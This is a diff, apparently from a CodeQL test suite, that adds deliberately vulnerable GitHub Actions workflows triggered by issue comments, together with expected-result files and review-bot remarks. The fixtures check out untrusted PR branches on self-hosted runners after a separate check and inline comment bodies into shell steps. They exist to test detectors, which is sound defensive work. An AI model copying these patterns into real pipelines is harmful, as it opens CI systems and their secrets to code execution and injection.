"depl=rollback" >> $GITHUB_OUTPUT + else + echo "depl=unknown deployment type" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ 
steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Notify deployment start in slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is in progress..." + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Deploy server + if: >- + ${{ + (contains(github.event.comment.body, '/deploy to') || + contains(github.event.comment.body, '/rollback')) && + !contains(github.event.comment.body, 'scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + COMMENT_BODY: ${{ github.event.comment.body }} + run: poetry run python server.py --endpoint_location=remote --autodeploy=True + + - name: Deploy scorer + if: >- + ${{ + contains(github.event.comment.body, '/deploy as async scorer') || + contains(github.event.comment.body, '/rollback async scorer') + }} + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + PR_NUMBER: ${{ github.event.issue.number }} + run: poetry run python scorer.py --as_pipeline=True --schedule=True --autodeploy=True + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report deployment outcome in slack + uses: 
slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s ${{ steps.environment.outputs.depl }} of <${{ github.event.issue.html_url }}|${{ github.event.issue.title }} #${{ github.event.issue.number }}> to ${{ steps.environment.outputs.env }} is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml b/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml new file mode 100644 index 000000000000..4a6d1452af24 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-367/.github/workflows/test6.yml 
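Review bot: `Get environment from comment` derives `target` with `sed 's/.* //'` over `$COMMENT_BODY` and writes it with `echo "env=$env" >> $GITHUB_OUTPUT`; a comment body spanning several lines yields a multi-line `target`, and every line after the first becomes an additional `name=value` entry in `GITHUB_OUTPUT`, which later steps then consume as ordinary step outputs. The multi-line delimiter form (`echo "env<<EOF"`, the value, `echo "EOF"`, each appended to `"$GITHUB_OUTPUT"`) or stripping newlines first avoids that, and `$GITHUB_OUTPUT` should be quoted; test4's environment step has the same construction. The `env=$(echo "$target")` line is an `echo` round-trip that does nothing `env=$target` would not. The allow-list check runs in `security-checks` on `ubuntu-latest`, while `deploy` resolves `head_ref` through a second `pull-request-comment-branch` call on the self-hosted runner, so the branch is re-resolved after the check rather than carried over from it; if that is the intended TOCTOU shape, a comment on `deploy`'s `Get PR branch` step saying so would help a reader match it to the .expected entry.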
@@ -0,0 +1,253 @@ +name: Kickoff custom pipeline + +on: + + issue_comment: + types: [created] + +jobs: + + security-checks: + + name: Carry out security checks + if: >- + ${{ + github.event.issue.pull_request && + contains(github.event.comment.body, '/kickoff') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + github.event.comment.user.type != 'Bot' && + github.event.pull_request.author_association != 'FIRST_TIMER' && + github.event.pull_request.author_association != 'FIRST_TIME_CONTRIBUTOR' && + github.event.pull_request.author_association != 'MANNEQUIN' && + github.event.pull_request.author_association != 'NONE' + }} + + runs-on: ubuntu-latest + + defaults: + run: + shell: bash + + permissions: + contents: write + issues: write + pull-requests: write + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2.0.0 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Install GH CLI + uses: dev-hanz-ops/install-gh-cli-action@8fff9050dae2d81b38f94500d8b74ad1d1d47410 #v0.2.0 + + - name: Check comment keywords + env: + COMMENT_BODY: ${{ github.event.comment.body }} + PR_COMMENT_ALLOW_LIST: ${{ secrets.PR_COMMENT_ALLOW_LIST }} + run: | + function list_subset { local list1="$1"; local list2="$2"; result=0; for item in $list2; do if ! [[ $list1 =~ (^|[[:space:]])"$item"($|[[:space:]]) ]]; then result=1; fi; done; return $result; } + full_allowlist="$PR_COMMENT_ALLOW_LIST $(ls models)" + + if `list_subset "echo $full_allowlist" "echo $COMMENT_BODY"` ; then + echo "Command keywords allowed. Proceeding!" + else + echo "Command keywords not allowed. Skipping!" 
+ exit 1 + fi + + docker-environment-creation: + + name: Build and push docker image + needs: security-checks + if: >- + ${{ + contains(github.event.comment.body, 'rebuild') && + contains(github.event.issue.labels.*.name, 'Pipeline Kickoff') && + needs.security-checks.result == 'success' + }} + runs-on: [self-hosted, production] + + permissions: + contents: write + + defaults: + run: + # Run bash like it came from an interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Checkout PR branch + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Log into Azure + uses: azure/login@a65d910e8af852a8061c627c456678983e180302 # @v2.2.0 + with: + creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Container registry login + run: | + echo "Logging into $REGISTRY" + az acr login --name ${REGISTRY} + env: + REGISTRY: ${{ secrets.DOCKER_REGISTRY }} + + - name: Prune old images + run: | + docker system prune -a -f + + - name: Create image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/build_aml_image -m $model + + - name: Push image + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') + script/push_aml_image -m $model + + kickoff-pipeline: + + name: Kickoff pipeline + needs: [security-checks, docker-environment-creation] + if: >- + ${{ + always() && + needs.security-checks.result == 'success' && + needs.docker-environment-creation.result != 'failure' && + needs.docker-environment-creation.result != 'cancelled' + }} + + runs-on: [self-hosted, production] + + permissions: + contents: write + issues: write + pull-requests: write + statuses: write + + defaults: + run: + # Run bash like it came from an 
interactive login, to make it so that + # the .bashrc gets loaded. + shell: bash -l {0} + + steps: + + - name: Get PR branch + uses: xt0rted/pull-request-comment-branch@d97294d304604fa98a2600a6e2f916a84b596dc7 # v2 + id: comment-branch + + - name: Set latest commit status as pending + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: pending + + - name: Checkout PR branch + uses: actions/checkout@v4 + with: + ref: ${{ steps.comment-branch.outputs.head_ref }} + + - name: Get pipeline info from comment + id: pipeline-info + run: | + model=$(echo "${{ github.event.comment.body }}" | sed 's/.*kickoff //' | sed 's/ .*//') && \ + scheduling=$(echo "${{ github.event.comment.body }}" | grep schedule | wc -l) && \ + echo "mdl=$model" >> $GITHUB_OUTPUT + if [[ $scheduling == 1 ]]; then + echo "schedule=True" >> $GITHUB_OUTPUT + else + echo "schedule=False" >> $GITHUB_OUTPUT + fi + + - name: Get email of actor + id: email + run: | + email="${{ github.actor }}@github.com" + echo "email=$email" >> $GITHUB_OUTPUT + + - name: Lookup Slack ID + id: slack-id + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + run: | + slack_id=$(curl -s -H "Authorization: Bearer $SLACK_BOT_TOKEN" "https://slack.com/api/users.lookupByEmail?email=${{ steps.email.outputs.email }}" | jq -r '.user.id') + echo "slack-id=$slack_id" >> $GITHUB_OUTPUT + + - name: Submit pipeline kickoff message to slack + id: slack-initiate + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is in progress..." 
+ } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Environment setup + uses: ./.github/actions/setup-env + with: + azure_creds: ${{ secrets.AZURE_CREDENTIALS }} + + - name: Kickoff run + if: contains(github.event.comment.body, '/kickoff') + env: + BOT_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: poetry run python trainer.py --model=${{ steps.pipeline-info.outputs.mdl }} --as_pipeline=True --schedule=${{ steps.pipeline-info.outputs.schedule }} + + - name: Set latest commit status as ${{ job.status }} + uses: myrotvorets/set-commit-status-action@3730c0a348a2ace3c110851bed53331bc6406e9f # v2.0.1 + if: always() + with: + sha: ${{ steps.comment-branch.outputs.head_sha }} + token: ${{ secrets.GITHUB_TOKEN }} + status: ${{ job.status }} + + - name: Report pipeline's run outcome to slack + uses: slackapi/slack-github-action@37ebaef184d7626c5f204ab8d3baff4262dd30f0 # v1.27.0 + if: always() + with: + channel-id: 'C05N5U3HH2M' # platform-health-ml-ops + payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected index 400adb446d26..418aeeea059e 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUCritical.expected 
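Review bot: This file is a near-verbatim copy of test3 — same jobs, steps and pinned actions — differing, as far as I can see, only in that `security-checks` has no `Check for conflicting pushes` step, so nothing here compares push time against comment time before the `head_ref` checkouts in the two later jobs. A one-line header comment under `name:` such as `# Variant of test3 without the pushed_at guard: only the keyword check precedes the head_ref checkouts` would make the distinction visible without diffing the two fixtures. The points raised on test3 (the no-op `github.event.pull_request.author_association` conditions, `$(ls models)` extending the allow-list from the checked-out PR, and `${{ github.event.comment.body }}` inlined into `run:` in `Create image`, `Push image` and `Get pipeline info from comment`) apply here unchanged.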
@@ -5,12 +5,105 @@ edges | .github/workflows/comment.yml:39:9:54:6 | Uses Step: issue | .github/workflows/comment.yml:54:9:58:6 | Uses Step | | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | -| .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:22:10:27:7 | Uses Step | -| .github/workflows/deployment.yml:22:10:27:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | -| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment1.yml:16:10:22:7 | Uses Step | .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment1.yml:22:10:27:7 | Uses Step | .github/workflows/deployment1.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment1.yml:27:10:30:7 | Run Step | .github/workflows/deployment1.yml:30:10:31:53 | Run Step | +| .github/workflows/deployment2.yml:16:10:22:7 | Uses Step | .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | +| .github/workflows/deployment2.yml:22:10:27:7 | Uses Step | .github/workflows/deployment2.yml:27:10:30:7 | Run Step | +| .github/workflows/deployment2.yml:27:10:30:7 | Run Step | .github/workflows/deployment2.yml:30:10:31:53 | Run Step | | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | | .github/workflows/label_actor.yml:13:9:17:6 | Uses Step | .github/workflows/label_actor.yml:17:9:17:41 | Run Step | +| .github/workflows/test0.yml:13:9:28:6 | Uses Step: issue | .github/workflows/test0.yml:28:9:32:6 | Uses Step | +| .github/workflows/test0.yml:28:9:32:6 | Uses Step | .github/workflows/test0.yml:32:9:34:2 | Run Step | +| .github/workflows/test0.yml:39:9:54:6 | Uses Step: issue | .github/workflows/test0.yml:54:9:58:6 | Uses Step | +| 
.github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | +| .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | +| .github/workflows/test1.yml:32:7:47:4 | Run Step | .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | +| .github/workflows/test1.yml:47:7:86:4 | Run Step: environment | .github/workflows/test1.yml:86:7:92:4 | Uses Step | +| .github/workflows/test1.yml:86:7:92:4 | Uses Step | .github/workflows/test1.yml:92:7:95:54 | Uses Step | +| .github/workflows/test2.yml:38:7:41:4 | Uses Step | .github/workflows/test2.yml:41:7:44:4 | Run Step | +| .github/workflows/test2.yml:41:7:44:4 | Run Step | .github/workflows/test2.yml:44:7:58:4 | Run Step | +| .github/workflows/test2.yml:44:7:58:4 | Run Step | .github/workflows/test2.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test2.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test2.yml:94:7:101:4 | Uses Step | +| .github/workflows/test2.yml:94:7:101:4 | Uses Step | .github/workflows/test2.yml:101:7:105:4 | Uses Step | +| .github/workflows/test2.yml:101:7:105:4 | Uses Step | .github/workflows/test2.yml:105:7:111:4 | Uses Step | +| .github/workflows/test2.yml:105:7:111:4 | Uses Step | .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test2.yml:111:7:135:4 | Run Step: environment | .github/workflows/test2.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test2.yml:135:7:141:4 | Run Step: email | .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test2.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test2.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test2.yml:169:7:174:4 | Uses Step | +| .github/workflows/test2.yml:169:7:174:4 | Uses Step | .github/workflows/test2.yml:174:7:187:4 | Run Step | +| 
.github/workflows/test2.yml:174:7:187:4 | Run Step | .github/workflows/test2.yml:187:7:198:4 | Run Step | +| .github/workflows/test2.yml:187:7:198:4 | Run Step | .github/workflows/test2.yml:198:7:206:4 | Uses Step | +| .github/workflows/test2.yml:198:7:206:4 | Uses Step | .github/workflows/test2.yml:206:7:226:4 | Uses Step | +| .github/workflows/test2.yml:206:7:226:4 | Uses Step | .github/workflows/test2.yml:226:7:227:45 | Run Step | +| .github/workflows/test3.yml:38:7:56:4 | Run Step: environment | .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test3.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test3.yml:60:7:65:4 | Uses Step | +| .github/workflows/test3.yml:60:7:65:4 | Uses Step | .github/workflows/test3.yml:65:7:68:4 | Uses Step | +| .github/workflows/test3.yml:65:7:68:4 | Uses Step | .github/workflows/test3.yml:68:7:83:2 | Run Step | +| .github/workflows/test3.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test3.yml:110:7:115:4 | Uses Step | +| .github/workflows/test3.yml:110:7:115:4 | Uses Step | .github/workflows/test3.yml:115:7:120:4 | Uses Step | +| .github/workflows/test3.yml:115:7:120:4 | Uses Step | .github/workflows/test3.yml:120:7:127:4 | Run Step | +| .github/workflows/test3.yml:120:7:127:4 | Run Step | .github/workflows/test3.yml:127:7:131:4 | Run Step | +| .github/workflows/test3.yml:127:7:131:4 | Run Step | .github/workflows/test3.yml:131:7:136:4 | Run Step | +| .github/workflows/test3.yml:131:7:136:4 | Run Step | .github/workflows/test3.yml:136:7:141:2 | Run Step | +| .github/workflows/test3.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test3.yml:173:7:180:4 | Uses Step | +| .github/workflows/test3.yml:173:7:180:4 | Uses Step | .github/workflows/test3.yml:180:7:185:4 | Uses Step | +| .github/workflows/test3.yml:180:7:185:4 | Uses Step | .github/workflows/test3.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test3.yml:185:7:197:4 | Run 
Step: pipeline-info | .github/workflows/test3.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test3.yml:197:7:203:4 | Run Step: email | .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test3.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test3.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test3.yml:231:7:236:4 | Uses Step | +| .github/workflows/test3.yml:231:7:236:4 | Uses Step | .github/workflows/test3.yml:236:7:242:4 | Run Step | +| .github/workflows/test3.yml:236:7:242:4 | Run Step | .github/workflows/test3.yml:242:7:250:4 | Uses Step | +| .github/workflows/test3.yml:242:7:250:4 | Uses Step | .github/workflows/test3.yml:250:7:270:4 | Uses Step | +| .github/workflows/test3.yml:250:7:270:4 | Uses Step | .github/workflows/test3.yml:270:7:271:45 | Run Step | +| .github/workflows/test4.yml:32:7:47:4 | Run Step | .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | +| .github/workflows/test4.yml:47:7:79:4 | Run Step: environment | .github/workflows/test4.yml:79:7:85:4 | Uses Step | +| .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | +| .github/workflows/test5.yml:38:7:41:4 | Uses Step | .github/workflows/test5.yml:41:7:44:4 | Run Step | +| .github/workflows/test5.yml:41:7:44:4 | Run Step | .github/workflows/test5.yml:44:7:58:2 | Run Step | +| .github/workflows/test5.yml:72:7:76:4 | Uses Step: comment-branch | .github/workflows/test5.yml:76:7:83:4 | Uses Step | +| .github/workflows/test5.yml:76:7:83:4 | Uses Step | .github/workflows/test5.yml:83:7:87:4 | Uses Step | +| .github/workflows/test5.yml:83:7:87:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | +| .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | +| .github/workflows/test5.yml:93:7:117:4 | Run Step: environment | 
.github/workflows/test5.yml:117:7:123:4 | Run Step: email | +| .github/workflows/test5.yml:117:7:123:4 | Run Step: email | .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | +| .github/workflows/test5.yml:123:7:131:4 | Run Step: slack-id | .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | +| .github/workflows/test5.yml:131:7:151:4 | Uses Step: slack-initiate | .github/workflows/test5.yml:151:7:156:4 | Uses Step | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:180:7:188:4 | Uses Step | +| .github/workflows/test5.yml:180:7:188:4 | Uses Step | .github/workflows/test5.yml:188:7:208:4 | Uses Step | +| .github/workflows/test5.yml:188:7:208:4 | Uses Step | .github/workflows/test5.yml:208:7:209:45 | Run Step | +| .github/workflows/test6.yml:38:7:42:4 | Uses Step: comment-branch | .github/workflows/test6.yml:42:7:47:4 | Uses Step | +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | .github/workflows/test6.yml:47:7:50:4 | Uses Step | +| .github/workflows/test6.yml:47:7:50:4 | Uses Step | .github/workflows/test6.yml:50:7:65:2 | Run Step | +| .github/workflows/test6.yml:88:7:92:4 | Uses Step: comment-branch | .github/workflows/test6.yml:92:7:97:4 | Uses Step | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | .github/workflows/test6.yml:97:7:102:4 | Uses Step | +| .github/workflows/test6.yml:97:7:102:4 | Uses Step | .github/workflows/test6.yml:102:7:109:4 | Run Step | +| .github/workflows/test6.yml:102:7:109:4 | Run Step | .github/workflows/test6.yml:109:7:113:4 | Run Step | +| .github/workflows/test6.yml:109:7:113:4 | Run Step | .github/workflows/test6.yml:113:7:118:4 | Run Step | +| .github/workflows/test6.yml:113:7:118:4 | Run Step | .github/workflows/test6.yml:118:7:123:2 | Run 
Step | +| .github/workflows/test6.yml:151:7:155:4 | Uses Step: comment-branch | .github/workflows/test6.yml:155:7:162:4 | Uses Step | +| .github/workflows/test6.yml:155:7:162:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | +| .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | +| .github/workflows/test6.yml:167:7:179:4 | Run Step: pipeline-info | .github/workflows/test6.yml:179:7:185:4 | Run Step: email | +| .github/workflows/test6.yml:179:7:185:4 | Run Step: email | .github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | +| .github/workflows/test6.yml:185:7:193:4 | Run Step: slack-id | .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | +| .github/workflows/test6.yml:193:7:213:4 | Uses Step: slack-initiate | .github/workflows/test6.yml:213:7:218:4 | Uses Step | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:224:7:232:4 | Uses Step | +| .github/workflows/test6.yml:224:7:232:4 | Uses Step | .github/workflows/test6.yml:232:7:252:4 | Uses Step | +| .github/workflows/test6.yml:232:7:252:4 | Uses Step | .github/workflows/test6.yml:252:7:253:45 | Run Step | #select -| .github/workflows/deployment.yml:27:10:30:7 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:27:10:30:7 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | -| .github/workflows/deployment.yml:30:10:31:53 | Run Step | .github/workflows/deployment.yml:16:10:22:7 | Uses Step | .github/workflows/deployment.yml:30:10:31:53 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. 
| .github/workflows/deployment.yml:13:19:13:27 | Public CI | Public CI | -| .github/workflows/label.yml:17:9:17:41 | Run Step | .github/workflows/label.yml:13:9:17:6 | Uses Step | .github/workflows/label.yml:17:9:17:41 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow on check $@. | .github/workflows/label.yml:11:9:11:73 | contain ... -test') | contain ... -test') | +| .github/workflows/comment.yml:58:9:60:2 | Run Step | .github/workflows/comment.yml:54:9:58:6 | Uses Step | .github/workflows/comment.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/comment.yml:68:9:68:43 | Run Step | .github/workflows/comment.yml:64:9:68:6 | Uses Step | .github/workflows/comment.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test0.yml:58:9:60:2 | Run Step | .github/workflows/test0.yml:54:9:58:6 | Uses Step | .github/workflows/test0.yml:58:9:60:2 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test0.yml:68:9:68:43 | Run Step | .github/workflows/test0.yml:64:9:68:6 | Uses Step | .github/workflows/test0.yml:68:9:68:43 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test4.yml:85:7:88:54 | Uses Step | .github/workflows/test4.yml:79:7:85:4 | Uses Step | .github/workflows/test4.yml:85:7:88:54 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:151:7:156:4 | Uses Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:151:7:156:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. 
| +| .github/workflows/test5.yml:156:7:169:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:156:7:169:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test5.yml:169:7:180:4 | Run Step | .github/workflows/test5.yml:87:7:93:4 | Uses Step | .github/workflows/test5.yml:169:7:180:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:213:7:218:4 | Uses Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:213:7:218:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:218:7:224:4 | Run Step | .github/workflows/test6.yml:162:7:167:4 | Uses Step | .github/workflows/test6.yml:218:7:224:4 | Run Step | Insufficient protection against execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected index e69de29bb2d1..3a001efbbe8a 100644 --- a/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected +++ b/ql/test/query-tests/Security/CWE-367/UntrustedCheckoutTOCTOUHigh.expected @@ -0,0 +1,2 @@ +| .github/workflows/test6.yml:42:7:47:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | +| .github/workflows/test6.yml:92:7:97:4 | Uses Step | Insufficient protection against execution of untrusted code on a privileged workflow. | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 85b937653249..6a629764adc7 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -301,9 +301,6 @@ edges | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:414:9:423:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | .github/workflows/pr-workflow.yml:386:9:391:6 | Uses Step | .github/workflows/pr-workflow.yml:423:9:432:2 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/pr-workflow-fork.yaml:7:3:7:21 | pull_request_target | .github/workflows/pr-workflow-fork.yaml | | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller3.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller3.yaml | -| .github/workflows/test5.yml:32:9:34:2 | Run Step | .github/workflows/test5.yml:28:9:32:6 | Uses Step | .github/workflows/test5.yml:32:9:34:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test5.yml:58:9:60:2 | Run Step | .github/workflows/test5.yml:54:9:58:6 | Uses Step | .github/workflows/test5.yml:58:9:60:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/test5.yml:4:3:4:15 | issue_comment | .github/workflows/test5.yml | -| .github/workflows/test5.yml:68:9:68:43 | Run Step | .github/workflows/test5.yml:64:9:68:6 | Uses Step | .github/workflows/test5.yml:68:9:68:43 | Run Step | Execution of untrusted code on a privileged workflow. 
